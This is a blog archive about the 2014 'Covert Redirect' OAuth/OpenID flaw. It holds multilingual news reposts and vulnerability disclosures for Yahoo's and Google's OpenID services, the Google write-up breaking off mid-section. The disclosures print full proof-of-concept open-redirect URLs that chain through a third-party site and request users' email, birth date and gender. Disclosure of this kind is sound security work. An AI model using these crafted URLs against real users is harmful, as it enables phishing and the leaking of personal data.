Showing posts with label OpenID. Show all posts
Showing posts with label OpenID. Show all posts
Thursday, 4 June 2015
Facebook, Google, Microsoft, Yahoo Users Threatened by New Security Flaw, Covert Redirect
A serious flaw in two widely used security standards could give anyone access to your account information at Google, Microsoft, Facebook, Twitter and many other online services. The flaw, dubbed "Covert Redirect" by its discoverer, exists in two open-source session-authorization protocols, OAuth 2.0 and OpenID.
Both standards are employed across the Internet to let users log into websites using their credentials from other sites, such as by logging into a Web forum using a Facebook or Twitter username and password instead of creating a new account just for that forum.
Attackers could exploit the flaw to disguise and launch phishing attempts from legitimate websites, said the flaw's finder, Mathematics Ph.D. student Wang Jing of the Nanyang Technological University in Singapore.
Wang believes it's unlikely that this flaw will be patched any time soon. He says neither the authentication companies (those with which users have an account, such as Google, Microsoft, Facebook, Twitter or LinkedIn, among others) nor the client companies (sites or apps whose users log in via an account from an authentication company) are taking responsibility for fixing the issue.
"The vulnerability is usually due to the existing weakness in the third-party websites," Wang writes on his own blog. "However, they have little incentive to fix the problem."
The biggest danger of Covert Redirect is that it could be used to conduct phishing attacks, in which cybercriminals seize login credentials, by using email messages containing links to malicious websites disguised as something their targets might want to visit.
Normal phishing attempts can be easy to spot, because the malicious page's URL will usually be off by a couple of letters from that of the real site. The difference with Covert Redirect is that an attacker could use the real website instead by corrupting the site with a malicious login popup dialogue box.
For example, say you regularly visit a given forum (the client company), to which you log in using your credentials from Facebook (the authentication company). Facebook uses OAuth 2.0 to authenticate logins, so an attacker could put a corrupted Facebook login popup box on this forum.
If you sign in using that popup box, your Facebook data will be released to the attacker, not to the forum. This means the attacker could possibly gain access to your Facebook account, which he or she could use to spread more socially engineered attacks to your Facebook friends.
Covert Redirect could also be used in redirection attacks, which is when a link takes you to a different page than the one expected.
Wang told CNET authentication companies should create whitelists — pre-approved lists that block any not on it — of the client companies that are allowed to use OAuth and OpenID to redirect to them. But he said he had contacted a number of these authentication companies, who all shifted blame elsewhere.
Wang told CNET Facebook had told him it "understood the risks associated with OAuth 2.0" but that fixing the flaw would be "something that can't be accomplished in the short term." Google and LinkedIn allegedly told Wang they were looking into the issue, while Microsoft said the issue did not exist on its own sites.
Covert Redirect appears to exist in the implementations of the OpenID and OAuth standards used on client websites and apps. But because these two standards are open-source and were developed by a group of volunteers, there's no company or dedicated team that could devote itself to fixing the issue.
Where does that leave things?
"Given the trust users put in Facebook and other major OAuth providers, I think it will be easy for attackers to trick people into giving some access to their personal information stored on those service," Chris Wysopal, chief technology officer of Boston-area security firm Veracode and a member of the legendary 1990s hackerspace the L0pht, told CNET.
"It's not easy to fix, and any effective remedies would negatively impact the user experience," Jeremiah Grossman, founder of Santa Clara, Calif.-based WhiteHat Security, told CNET. "Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws."
Users should be extra-wary of login popups on Web pages. If you wish to log into a given website, it might be better to use an account specific to that website instead of logging in with Facebook, Twitter, or another authentication company, which would require the use of OAuth and/or OpenID to do.
If you think someone has gained access to one of your online accounts, notify the service and change that account's password immediately.
Related Articles:
http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html
http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/
http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html
http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html
http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/
http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
http://whitehatview.tumblr.com/post/120695795041
http://russiapost.blogspot.ru/2015/05/openid-oauth-20.html
http://www.diebiyi.com/articles/security/covert-redirect/covert_redirect/
http://whitehatpost.lofter.com/post/1cc773c8_706b622
https://itswift.wordpress.com/2014/05/06/microsoft-google-facebook-attacked/
http://tetraph.blog.163.com/blog/static/2346030512015420103814617/
http://itsecurity.lofter.com/post/1cfbf9e7_72e2dbe
http://ithut.tumblr.com/post/119493304233/securitypost-une-faille-dans-lintegration
http://japanbroad.blogspot.jp/2015/05/oauthopenid-facebook.html
http://webtech.lofter.com/post/1cd3e0d3_6f0f291
https://webtechwire.wordpress.com/2014/05/11/covert-redirect-attack-worldwide/
http://whitehatview.tumblr.com/post/119489968576/securitypost-sicherheitslucke-in-oauth-2-0-und
http://www.inzeed.com/kaleidoscope/computer-security/facebook-google-attack/
Labels:
0day Flaw,
by New Security,
Cnet,
Covert Redirect,
Facebook,
Google,
hacker-prevention,
IT Technology,
Jing Wang,
Linkedin,
Microsoft,
OAuth 2.0,
Open Source,
OpenID,
Tomsguid,
Users Threat,
Web News,
Yahoo
Wednesday, 13 May 2015
互聯網登錄系統曝出重大漏洞 黑客可用知名網站釣魚 - Covert Redirect
繼OpenSSL漏洞後,開源安全軟件再曝安全漏洞。
攻擊者創建壹個使用真實站點地址的彈出式登錄窗口——
黑客可利用該漏洞給釣魚網站“變裝”,
騰訊,阿裏巴巴,QQ、新浪微博、淘寶網,支付寶,網易,
鑒於OAuth和OpenID被廣泛用於各大公司——如微軟、
OAuth 是壹個被廣泛應用的開放登六協議,
相關資料,
http://tetraph.com/covert_
http://techxplore.com/news/
http://phys.org/news/2014-05-
http://news.yahoo.com/
http://thehackernews.com/2014/
http://blog.kaspersky.com/
https://hackertopic.wordpress.com/2014/05/26/covert-redirect-attacks
http://www.foxnews.com/tech/
http://network.pconline.com.
http://computerobsess.blogspot.com/2015/05/covert-redirect.html
http://ittechnology.lofter.com/post/1cfbf60d_6f09f58
http://diebiyi.com/articles/security/covert-redirect/oauth-2-0-openid-covert-redirect/
https://zh.wikipedia.org/wiki/covert-redirect
http://media.sohu.com/
http://it.people.com.cn/n/
http://www.inzeed.com/kaleidoscope/covert-redirect/oauth-2-0-and-openid-covert-redirect/
http://www.baike.com/wiki/covert-redirect-bug
http://www.csdn.net/article/
Sunday, 30 November 2014
隱蔽重定向(Covert Redirect)因其對 OAuth 和 OpenID 的影響而為人所知

隱蔽重定向(英语:Covert Redirect)[1],是關於單點登錄 (Single sign-on) 的安全漏洞。因其對 OAuth 和 OpenID 的影響而為人所知[2]。由新加坡南洋理工大學物理和數學科學學院博士生王晶(Wang Jing)發現並命名[3]。
Covert Redirect的壹個重要應用是phishing[4],別的網站釣魚是用假的網站,而 Covert Redirect卻是用真的知名網站進行釣魚。這是壹種完美釣魚方式[5]。
https://zh.wikipedia.org/wiki/%E9%9A%B1%E8%94%BD%E9%87%8D%E5%AE%9A%E5%90%91%E6%BC%8F%E6%B4%9E
Friday, 31 October 2014
Otra brecha de seguridad amenaza parte de Internet
Cuando aún muchos servidores en el mundo se mantienen afectados por Heartbleed hay noticias de otro fallo de grandes magnitudes, aunque sin llegar al nivel del primero. La vulnerabilidad que existe ahora es en OAuth y OpenID y los usuarios muy poco podemos hacer al respecto, ya que la solución está en manos de las empresas.
OAuth y OpenID son herramientas de código abierto para autentificar usuarios y que utilizan empresas como Google, Facebook, Microsoft, Yahoo, Paypal y Linkedin. Todos hemos visto estas herramientas, que abren ventanas emergentes donde se nos pide autentificarnos con alguna de nuestras cuentas para poder acceder a cierto contenido o servicio.
El problema consiste en que aparece una ventana que nos pide redirigirnos a Facebook, la cual parece totalmente segura pero no lo es. Hasta aquí la cuestión funciona como si fuese phishing, pero va más allá ya que el exploid, que se ha llamado Covert Redirect, obtiene la información del usuario desde el servidor, sin que el usuario tenga que introducirla.
Esta nueva vulnerabilidad ha sido descubierta por Wang Jing, un estudiante de doctorado de la Universidad Técnica de Nanyang, en Singapur. El problema podría salir caro para las empresas pero en algún momento tendrán que poner manos a la obra. De momento se recomienda no loggearse a las cuentas digitales a través de ventanas emergentes.
Labels:
aplicación,
el crimen,
el phishing,
ingeniería,
inteligencia,
internet,
la investigación,
la vulnerabilidad,
matemáticas,
OAuth 2.0,
OpenID,
redirección,
redirección encubierta,
singapur,
sitio web,
URL
Falha de segurança afetam logins de Facebook
Um estudante de PHD de Singapura, Wang , identificou a falha, chamada de “Covert Redirect”, que consegue usar domínios reais de sites para verificação de páginas de login falsas, enganando os internautas.
Os cibercriminosos podem criar links maliciosos para abrir janelas pop-up do Facebook pedindo que o tal aplicativo seja autorizado.
Caso seja realizada esta sincronização, os dados pessoais dos usuários serão passados para os hackers.
Wang afirma que já entrou em contato com o Facebook, porém recebeu uma resposta de que “entende os riscos de estar associado ao OAuth 2.0″ e que corrigir a falha “é algo que não pode ser feito por enquanto”.
O Google afirmou que o problema está sendo rastreado, o LinkedIn publicou nota em que garante que já tomou medidas para evitar que a falha seja explorada, e a Microsoft negou que houvesse vulnerabilidade em suas páginas, apenas nas de terceiros.
A recomendação do descobridor da falha para os internautas é que evitem fazer o login com dados de confirmação de Facebook, Google ou qualquer outro serviço sem terem total certeza de que estão em um ambiente seguro.
Labels:
a pesquisa,
aplicação,
ataque,
crime,
defesa,
inteligência,
internet,
matemática,
OAuth 2.0,
OpenID,
Phishing,
redirecionamento,
redirecionamento encoberta,
Singapura,
URL,
vulnerabilidade,
website
Sicherheitslücke in OAuth 2.0 und OpenID gefunden
So ist es möglich, dem Nutzer eine Mail mit einem speziell präparierten Link zukommen zu lassen, ein Klick auf diesen öffnet eben wie gesagt eine legitime Adresse samt entsprechendem Logo. Autorisiert der Nutzer dann diese Anfrage und loggt sich in den Dienst ein, so werden die Daten nicht an die vermeintliche App weitergeleitet, sondern gelangen eben in den Besitz des Angreifers. Je nachdem, welche Daten abfragt werden, bekommt dieser somit also E-Mail-Adresse, Geburtsdatum, Kontaktlisten und dergleichen. Ebenso ist es möglich, den Nutzer nach dem Login auf eine beliebige Webseite, welche unter Umständen Malware verbreitet, weiterzuleiten.

Die Lösung des Problems könnte aber – wenn es überhaupt einmal eine geben sollte – eine langwierige Sache sein. Wang Jing hat bereits etliche größere Anbieter der Loginmethoden angeschrieben und über die gefundene Sicherheitslücke aufgeklärt, hierbei gab es jedoch unterschiedliche Aussagen. Im Hause Google beobachtet man das Problem, Microsoft ist sich keiner Schuld bewusst und schiebt die Sicherheitslücke an Drittanbieter ab. Lediglich Facebook scheint hier ehrlich zu sein und gibt an, dass es sich dabei um ein grundsätzliches Problem von OAuth 2.0 und OpenID handelt – möchte man nicht eine umfangreiche Whitelist mit sämtlichen nicht-schädlichen Apps pflegen, ist die Sicherheitslücke nicht “mal eben so” zu beheben. Im Grunde dürften sich sämtliche Gegenmaßnahmen negativ auf die Nutzererfahrung auswirken, was natürlich keiner der Dienste in Kauf nehmen möchte – und so bleibt es hierbei scheinbar beim “kleineren Übel” für die Anbieter.
So bleibt eigentlich nur die Möglichkeit, auf OAuth 2.0 oder OpenID als Login-Methode für Drittanbieter Dienste und Apps zu verzichten oder genauestens darauf zu achten, auf was man klickt. Hat man keine explizite Autorisierung angestoßen, sollte man die geöffneten Tabs umgehend schließen und darauf hoffen, dass sich nicht doch irgendwo ein falscher Link eingepfercht hat.
Quelle:
http://www.blogtogo.de/sicherheitsluecke-in-oauth-2-0-und-openid-gefunden/
News Verwandte:
http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discovered/
http://techxplore.com/news/2014-05-math-student-oauth-openid-vulnerability.html
http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discovered/
http://techxplore.com/news/2014-05-math-student-oauth-openid-vulnerability.html
http://tech.ifeng.com/internet/detail_2014_05/03/36130721_0.shtml/
http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
http://russiapost.blogspot.ru/2014/11/openid-oauth-20.html?view=sidebar
http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
http://russiapost.blogspot.ru/2014/11/openid-oauth-20.html?view=sidebar
Saturday, 3 May 2014
Yahoo Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)
Yahoo Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)
(1) Domain:
yahoo.com
"Yahoo Inc. (styled as Yahoo!) is an American multinational technology company headquartered in Sunnyvale, California. It is globally known for its Web portal, search engine Yahoo Search, and related services, including Yahoo Directory, Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Groups, Yahoo Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo websites every month. Yahoo itself claims it attracts "more than half a billion consumers every month in more than 30 languages." Yahoo was founded by Jerry Yang and David Filo in January 1994 and was incorporated on March 1, 1995. Marissa Mayer, a former Google executive, serves as CEO and President of the company." (Wikipedia)
(2) Vulnerability Description:
Yahoo web application has a computer security problem. Hacker can exploit it by Covert Redirect cyber attacks.
The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7.
(2.1) Vulnerability Detail:
Yahoo's OpenID system is susceptible to Attacks. More specifically, the authentication of parameter "&openid.return_to" in OpenID system is insufficient. It can be misused to design Open Redirect Attacks to Yahoo.
It increases the likelihood of successful Open Redirect Attacks to third-party websites, too.
The vulnerability was reported to Yahoo. Yahoo do not reply the report for months.
The vulnerabilities occurs at page "/openid/op/auth?" with parameter "&openid.return_to", e.g.
https://open.login.yahooapis.com/openid/op/auth?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Ftree.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=J3IvS0xNnpIPn34CEn0hiEWBXYqhaV941hmD.Yx2_vv8JZk2gWSEWoOjpjKYvkNSvP3mUGcz1J1UoIIvaNWTjwMhrKyizwARZNZwooVUVGEvA9sau2DcXoMbLRuhkJ_HOS.O_w--&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry [1]
Before acceptance of third-party application:
When a logged-in Yahoo user clicks the URL ([1]) above, he/she will be asked for consent as in whether to allow a third-party website to receive his/her information. If the user clicks OK, he/she will be then redirected to the URL assigned to the parameter "&openid.return_to".
If a user has not logged onto Yahoo and clicks the URL ([1]) above, the same situation will happen upon login.
After acceptance of third-party application:
A logged-in Yahoo user would no longer be asked for consent and could be redirected to a webpage controlled by the attacker when he/she clicks the URL ([1]).
For a user who has not logged in, the attack could still be completed after a pop-up page that prompts him/her to log in.
(2.1.1) Yahoo would normally allow all the URLs that belong to the domain of an authorized third-party website. However, these URLs could be prone to manipulation. For example, the "&openid.return_to" parameter in the URLs is supposed to be set by the third-party websites, but an attacker could change its value to make Attacks.
Hence, a user could be redirected from Yahoo to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site unwillingly. This is as if the user is redirected from Yahoo directly. The number of Yahoo's OpenID client websites is so huge that such Attacks could be commonplace.
Before acceptance of the third-party application, Yahoo's OpenID system makes the redirects appear more trustworthy and could potentially increase the likelihood of successful Open Redirect Attacks of third-party website.
Once the user accepts the application, the attackers could completely bypass Yahoo's authentication system and attack more easily.
It might be of Yahoo's interest to patch up against such attacks.
(2.2) Used one of webpages for the following tests. The webpage is "http://qianqiuxue.tumblr.com/". Can suppose it is malicious.
Below is an example of a vulnerable third-party domain:
rhogroupee.com
Vulnerable URL in this domain:
http://www.rhogroupee.com/join/context/GENERAL/redirect/http%3A%2F%2Fwww.tetraph.com%2Fessayjeans%2Fpoems%2Ftree.html
Vulnerable URL from Yahoo that is related to rhogroupee.com:
https://open.login.yahooapis.com/openid/op/auth?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fuser-social-network-login%252FauthProvider%252F11%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.rhogroupee.com&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=J3IvS0xNnpIPn34CEn0hiEWBXYqhaV941hmD.Yx2_vv8JZk2gWSEWoOjpjKYvkNSvP3mUGcz1J1UoIIvaNWTjwMhrKyizwARZNZwooVUVGEvA9sau2DcXoMbLRuhkJ_HOS.O_w--&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry
POC:
https://open.login.yahooapis.com/openid/op/auth?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Ftree.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=J3IvS0xNnpIPn34CEn0hiEWBXYqhaV941hmD.Yx2_vv8JZk2gWSEWoOjpjKYvkNSvP3mUGcz1J1UoIIvaNWTjwMhrKyizwARZNZwooVUVGEvA9sau2DcXoMbLRuhkJ_HOS.O_w--&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry
(2.3) The following URLs have the same vulnerabilities.
https://open.login.yahooapis.jp/openid/op/auth?openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns.ui=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fui%2F1.0&openid.aOpenIDc_handle=NzyCQVND6Ye3gpqIwY2OfibN1TEgEdBdWuFF5f7u0i7vypb6Wc24wHAU9yq38HAVL0ZLMpiYwFsXLRYkDwkrXarvXvAdUgQJG.spVXE0E3pKSlcC.fGzVxuv4Rlz97CrHA--&openid.ui.lang=&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ui.mode=popup&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.realm=http%3A%2F%2Fblogos.com%2F&openid.return_to=http%3A%2F%2Fblogos.com%2Fauth%2Fopenid%2Fyahoo_jp%2Fauthorized%2F
https://login.yahoo.com/config/login?.intl=us&.src=openid&.partner=&.pd=c%3DmZmAFpe.2e7WuWzcHD2ZPYQ-%26ockey%3Dwww.rhogroupee.com%2Fsite%26op%3D1&occrumb=whzgUu25n/7&.done=https%3A%2F%2Fopen.login.yahoo.com%2Fopenid%2Fop%2Fstart%3Fz%3DxInDXI3UxbcCGVeYz0i4ughRSKZSWISpvv91_Uz_XJAiweKdA17AACUzm8IeiLbOCmUn1FcbHfhAcL5Kt66Aa9WnFGbYStqsZkoniGY5xN_EblGXfoCIwAqNMnw1ee_ycMa0xhBAHzQ22FwkhSFPRWP34tKQ_2aagPZ7pgHQyBrNb0xg8pyYTJMtsab5RY1dGP.u4EV7Ayq6Sno.XKNpJaFNyIgttiRS0rdNS7pE1U5kCxFUAPuSjC8QLmP1lTJy5Tsjk2tLkQCKftBzt7G7n0bJaLjDcOv4uEe1X1vkcOgp4lxufA0Qvt9aJnGDhcDj4MEVIfuPeuN.fhfeBgsktxsuof64h0.xrmz1Aw8qTQ57gJibGRJ291Vv_2RF79uaWXDay.DN.5A8Q9_agN6iWDRIKjb8sLKYYR42N2Fk1Nq8hbrP92rsEM0mYHlKIsDXdNlrrK8tM_Jy1E64PDIz8rllNXqlCQ.idF4p4Yi3TzIeeTdYm7gbBleqIsbcEuigfg6n_i6iGmpY%26.scrumb%3D0
POC Video:
https://www.youtube.com/watch?v=1FZ6yfsp09U
Blog Detail:
http://tetraph.blogspot.com/2014/05/yahoos-openid-covert-redirect.html
(3) What is Covert Redirect?
Covert Redirect is a class of security bugs disclosed in May 2014. It is an application that takes a parameter and redirects a user to the parameter value without sufficient validation. This often makes use of Open Redirect and XSS (Cross-site Scripting) vulnerabilities in third-party applications.
Covert Redirect is also related to single sign-on. It is known by its influence on OAuth and OpenID. Hacker may use it to steal users' sensitive information. Almost all OAuth 2.0 and OpenID providers worldwide are affected. Covert Redirect can work together with CSRF (Cross-site Request Forgery) as well. After Covert Redirect was published, it is kept in some common databases such as SCIP, OSVDB, Bugtraq, and X-Force. Its scipID is 13185, while OSVDB reference number is 106567. Bugtraq ID: 67196. X-Force reference number is 93031.
Discover and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
Related Articles:
http://tetraph.com/security/covert-redirect/yahoos-openid-covert-redirect-vulnerablity/
https://twitter.com/tetraphibious/status/559167044256407555
http://securityrelated.blogspot.com/2014/06/yahoo-website-bug.html
http://tetraph.blog.163.com/blog/static/234603051201444023436/
http://webtech.lofter.com/post/1cd3e0d3_706aef5
http://whitehatview.tumblr.com/post/119490381041/securitypost#notes
https://inzeed.wordpress.com/2014/05/26/yahoo-openid-hack/
http://computerobsess.blogspot.com/2014/06/yahoo-website-bug.html
http://www.inzeed.com/kaleidoscope/covert-redirect/yahoos-openid-covert-redirect-vulnerablity/
https://webtechwire.wordpress.com/2014/05/26/yahoo-openid-hack/
Labels:
0-day Exploit,
attack prevention,
Covert Redirect,
cyber intelligence,
hacker,
information,
IT-Tech,
Online Service,
Open Redirect,
OpenID,
Phishing,
spam,
URF,
vulnerability,
Wang.Jing,
Website Security,
Yahoo
Friday, 2 May 2014
Google Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)
Google Online Service OpenID Covert Redirect Web Security Bugs (Information Leakage & Open Redirect)
(1) Domain:
google.com
"Google has been estimated to run more than one million servers in data centers around the world (as of 2007). It processes over one billion search requests and about 24 petabytes of user-generated data each day (as of 2009). In December 2013, Alexa listed google.com as the most visited website in the world. Numerous Google sites in other languages figure in the top one hundred, as do several other Google-owned sites such as YouTube and Blogger. Its market dominance has led to prominent media coverage, including criticism of the company over issues such as search neutrality, copyright, censorship, and privacy." (Wikipedia)
(2) Vulnerability Description:
Google web application has a computer security problem. Hacker can exploit it by Covert Redirect cyber attacks.
The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7.
(2.1) Vulnerability Detail:
Google's OpenID system is susceptible to Attacks. More specifically, the authentication of parameter "&openid.return_to" in OpenID system is insufficient. It can be misused to design Open Redirect Attacks to Google.
It increases the likelihood of successful Open Redirect Attacks to third-party websites, too.
Google replies "Thanks for the reporting this issue. we're already tracking[the vulnerability] ..."
The vulnerabilities occurs at page "/accounts/o8/ud?" with parameter "&openid.return_to", e.g.
https://www.google.com/accounts/o8/ud?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Fdistance.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=1.AMlYA9UWc8Nk_QfiFEpKcE9A7qm0ErEkNLgQcbOwTR_aLdEyFS4ybtZQ_V9-4ARxUqsGIpPFtRd9Mw&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry [1]
Before acceptance of third-party application:
When a logged-in Google user clicks the URL ([1]) above, he/she will be asked for consent as in whether to allow a third-party website to receive his/her information. If the user clicks OK, he/she will be then redirected to the URL assigned to the parameter "&openid.return_to".
If a user has not logged onto Google and clicks the URL ([1]) above, the same situation will happen upon login.
After acceptance of third-party application:
A logged-in Google user would no longer be asked for consent and could be redirected to a webpage controlled by the attacker when he/she clicks the URL ([1]).
For a user who has not logged in, the attack could still be completed after a pop-up page that prompts him/her to log in.
(2.1.1) Google would normally allow all the URLs that belong to the domain of an authorized third-party website. However, these URLs could be prone to manipulation. For example, the "&openid.return_to" parameter in the URLs is supposed to be set by the third-party websites, but an attacker could change its value to make Attacks.
Hence, a user could be redirected from Google to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site unwillingly. This is as if the user is redirected from Google directly. The number of Google's OpenID client websites is so huge that such Attacks could be commonplace.
Before acceptance of the third-party application, Google's OpenID system makes the redirects appear more trustworthy and could potentially increase the likelihood of successful Open Redirect Attacks of third-party website.
Once the user accepts the application, the attackers could completely bypass Google's authentication system and attack more easily.
It might be of Google's interest to patch up against such attacks.
(2.2) Use one of webpages for the following tests. The webpage is "http://xingzhehong.lofter.com/". Can suppose it is malicious.
Below is an example of a vulnerable third-party domain:
rhogroupee.com
Vulnerable URL in this domain:
